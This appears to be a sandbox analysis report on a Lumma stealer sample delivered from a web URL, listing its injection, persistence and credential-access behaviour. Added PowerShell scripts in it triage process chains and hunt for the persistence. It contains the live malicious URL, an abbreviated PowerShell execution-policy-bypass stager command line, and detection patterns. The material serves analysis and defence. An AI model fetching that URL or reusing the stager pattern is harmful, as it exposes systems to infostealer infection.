Malware Analysis Report

2024-11-30 05:32

Sample ID 240709-lp9jgazdrg
Target https://instantinfo.shop/webdav/jreg/CONT
Tags
lumma spyware stealer
score
10/10

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://instantinfo.shop/webdav/jreg/CONT was found to be: Known bad.

Malicious Activity Summary

lumma spyware stealer

Lumma Stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

Blocklisted process makes network request

Downloads MZ/PE file

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Drops startup file

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Enumerates processes with tasklist

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Modifies registry class

Opens file in notepad (likely ransom note)

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
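The summary above is the sandbox's signature list; the script below turns the chain it describes (Edge opens the URL, mshta.exe runs CONT.hta, PowerShell decrypts and runs a stager, 1ASPX.exe hollows more.com, Run.pif runs from Temp) into a small triage over process-creation records with Sysmon Event ID 1 style fields. This is an added example, not part of the report or of any vendor ruleset: the `$events` list is constructed from the report's Processes section (PIDs the report does not give are 0, command lines are abbreviated), and the rules are illustrative heuristics. Because Run.pif later creates a process with Explorer.EXE (PID 3580) as the declared parent (the NtCreateUserProcessOtherParentProcess rows), lineage-only rules can be fooled, so the checks key on image path and command line as well as parent.

```powershell
# Added example, not part of the sandbox report. Scores process-creation records
# (Sysmon Event ID 1 style fields) against the chain this detonation produced.
# $events is CONSTRUCTED from the report's process list: PIDs the report does not
# state are 0, command lines are abbreviated. Rules are illustrative heuristics.

$events = @(
    [pscustomobject]@{ Pid = 2700; ParentImage = 'C:\Windows\Explorer.EXE'
        Image = 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe'
        CommandLine = '"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://instantinfo.shop/webdav/jreg/CONT' }
    [pscustomobject]@{ Pid = 0; ParentImage = 'C:\Windows\Explorer.EXE'
        Image = 'C:\Windows\SysWOW64\mshta.exe'
        CommandLine = '"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\CONT.hta"' }
    [pscustomobject]@{ Pid = 0; ParentImage = 'C:\Windows\SysWOW64\mshta.exe'
        Image = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -w 1 -ep Unrestricted -nop function KdzuM($NJCgwo){...}' }
    [pscustomobject]@{ Pid = 1936; ParentImage = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
        Image = 'C:\ProgramData\1ASPX.exe'; CommandLine = '"C:\ProgramData\1ASPX.exe"' }
    [pscustomobject]@{ Pid = 3000; ParentImage = 'C:\ProgramData\1ASPX.exe'
        Image = 'C:\Windows\SysWOW64\more.com'; CommandLine = 'C:\Windows\SysWOW64\more.com' }
    [pscustomobject]@{ Pid = 4728; ParentImage = 'unknown'   # parent not given in the report
        Image = 'C:\Users\Admin\AppData\Local\Temp\64684\Run.pif'
        CommandLine = 'C:\Users\Admin\AppData\Local\Temp\64684\Run.pif' }
)

function Invoke-ProcessChainTriage {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        $hits = @()
        # mshta -> powershell: the HTA stage handing off to the decrypt-and-run stager
        if ($e.Image -match '(?i)\\powershell\.exe$' -and $e.ParentImage -match '(?i)\\mshta\.exe$') {
            $hits += 'PowerShell spawned by mshta.exe'
        }
        # -ep Unrestricted/Bypass combined with a hidden window or no profile
        if ($e.Image -match '(?i)\\powershell\.exe$' -and
            $e.CommandLine -match '(?i)-ep\s+(Unrestricted|Bypass)' -and
            $e.CommandLine -match '(?i)(-nop\b|-w\s+1\b|-WindowStyle\s+Hidden)') {
            $hits += 'Execution-policy bypass with hidden window / no profile'
        }
        # Binaries run from ProgramData or the user Temp folder (1ASPX.exe, Run.pif)
        if ($e.Image -match '(?i)^C:\\(ProgramData|Users\\[^\\]+\\AppData\\Local\\Temp)\\.*\.(exe|pif|scr)$') {
            $hits += 'Executable run from user-writable location'
        }
        # more.com is a console pager; as the child of a ProgramData binary it is the
        # SetThreadContext target from the report, not a user paging output
        if ($e.Image -match '(?i)\\more\.com$' -and $e.ParentImage -notmatch '(?i)\\(cmd|conhost)\.exe$') {
            $hits += 'more.com started by a non-console parent (injection target)'
        }
        if ($hits.Count -gt 0) {
            [pscustomobject]@{ Pid = $e.Pid; Image = $e.Image; Findings = ($hits -join '; ') }
        }
    }
}

Invoke-ProcessChainTriage -Events $events | Format-Table -AutoSize -Wrap
```

Run against real Sysmon or EDR exports, replace `$events` with the parsed records; the function only needs the Pid, ParentImage, Image and CommandLine fields. The Edge row produces no finding on its own, which is the point: the URL open is legitimate browser activity and the chain only becomes visible from the mshta and PowerShell rows onward.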

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-09 09:43

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-09 09:43

Reported

2024-07-09 09:47

Platform

win10v2004-20240704-en

Max time kernel

200s

Max time network

203s

Command Line

C:\Windows\Explorer.EXE

Signatures

Lumma Stealer

stealer lumma

Suspicious use of NtCreateUserProcessOtherParentProcess

Description | Indicator | Process | Target
PID 4728 created 3580 | N/A | C:\Users\Admin\AppData\Local\Temp\64684\Run.pif | C:\Windows\Explorer.EXE
PID 4728 created 3580 | N/A | C:\Users\Admin\AppData\Local\Temp\64684\Run.pif | C:\Windows\Explorer.EXE

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Downloads MZ/PE file

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\DQETZ5NEYRS9996CDCA36DJS07.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SFTJHYUHO4CL1MMZJUD0ZK54K0.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DolphinLogix.url | C:\Windows\SysWOW64\cmd.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DolphinLogix.url | C:\Windows\SysWOW64\cmd.exe | N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1936 set thread context of 3000 | N/A | C:\ProgramData\1ASPX.exe | C:\Windows\SysWOW64\more.com
PID 1908 set thread context of 4880 | N/A | C:\ProgramData\1ASPX.exe | C:\Windows\SysWOW64\more.com

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
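The two persistence mechanisms recorded above (the DolphinLogix.url shortcut written to the per-user Startup folder under "Drops startup file", and the schtasks.exe invocation under "Scheduled Task/Job") are what a responder would sweep other hosts for. The script below is an added example, not part of the report: it lists every .url file in the all-users and per-user Startup folders with the URL= target it launches, and every scheduled-task action that runs from a user-writable path or through a LOLBin. It does not hard-code the DolphinLogix.url name or any task name (the report gives none); the path and keyword patterns it flags are assumptions chosen to match this chain.

```powershell
# Added example, not part of the sandbox report. Hunts for the two persistence
# artefacts seen in this detonation: a .url shortcut in a Startup folder and a
# scheduled task registered with schtasks.exe. The regexes are assumptions.

function Get-StartupUrlShortcuts {
    # All-users Startup folder plus the Startup folder of every profile on disk
    $roots = [System.Collections.Generic.List[string]]::new()
    $roots.Add((Join-Path $env:ProgramData 'Microsoft\Windows\Start Menu\Programs\StartUp'))
    Get-ChildItem -Path (Join-Path $env:SystemDrive 'Users') -Directory -ErrorAction SilentlyContinue |
        ForEach-Object { $roots.Add((Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup')) }

    foreach ($root in $roots) {
        Get-ChildItem -Path $root -Filter '*.url' -File -ErrorAction SilentlyContinue | ForEach-Object {
            # .url files are INI text; the URL= line is what Explorer launches at logon.
            # A target inside Temp or ProgramData, or a .pif/.hta, is the red flag.
            $target = (Get-Content -Path $_.FullName -ErrorAction SilentlyContinue |
                       Where-Object { $_ -match '^URL=' }) -replace '^URL=', ''
            [pscustomobject]@{
                File       = $_.FullName
                Target     = $target
                Suspicious = [bool]($target -match '(?i)\\AppData\\Local\\Temp\\|\\ProgramData\\|\.pif\b|\.hta\b')
                CreatedUtc = $_.CreationTimeUtc
            }
        }
    }
}

function Get-SuspiciousScheduledTasks {
    # Task actions that execute from user-writable locations or via mshta/powershell -ep
    Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
        foreach ($a in $_.Actions) {
            $cmd = "$($a.Execute) $($a.Arguments)".Trim()
            if ($cmd -match '(?i)\\AppData\\|\\ProgramData\\|\\Temp\\|\.pif\b|mshta|powershell.*-ep') {
                [pscustomobject]@{
                    TaskPath = $_.TaskPath
                    TaskName = $_.TaskName
                    State    = $_.State
                    Command  = $cmd
                }
            }
        }
    }
}

Get-StartupUrlShortcuts | Where-Object Suspicious | Format-Table -AutoSize -Wrap
Get-SuspiciousScheduledTasks | Format-Table -AutoSize -Wrap
```

Run it elevated so every profile's Startup folder and every task path are readable; non-elevated runs silently skip what they cannot open. The report only shows cmd.exe creating and modifying the .url file, not its contents, so the `Target` column is what to pivot on when the same shortcut name turns up elsewhere.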

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\1ASPX.exe N/A
N/A N/A C:\ProgramData\1ASPX.exe N/A
N/A N/A C:\ProgramData\1ASPX.exe N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\1ASPX.exe N/A
N/A N/A C:\ProgramData\1ASPX.exe N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Windows\SysWOW64\SearchIndexer.exe N/A
N/A N/A C:\Windows\SysWOW64\SearchIndexer.exe N/A
N/A N/A C:\Windows\SysWOW64\SearchIndexer.exe N/A
N/A N/A C:\Windows\SysWOW64\SearchIndexer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\1ASPX.exe N/A
N/A N/A C:\ProgramData\1ASPX.exe N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\64684\Run.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2700 wrote to memory of 2528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2700 wrote to memory of 2872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
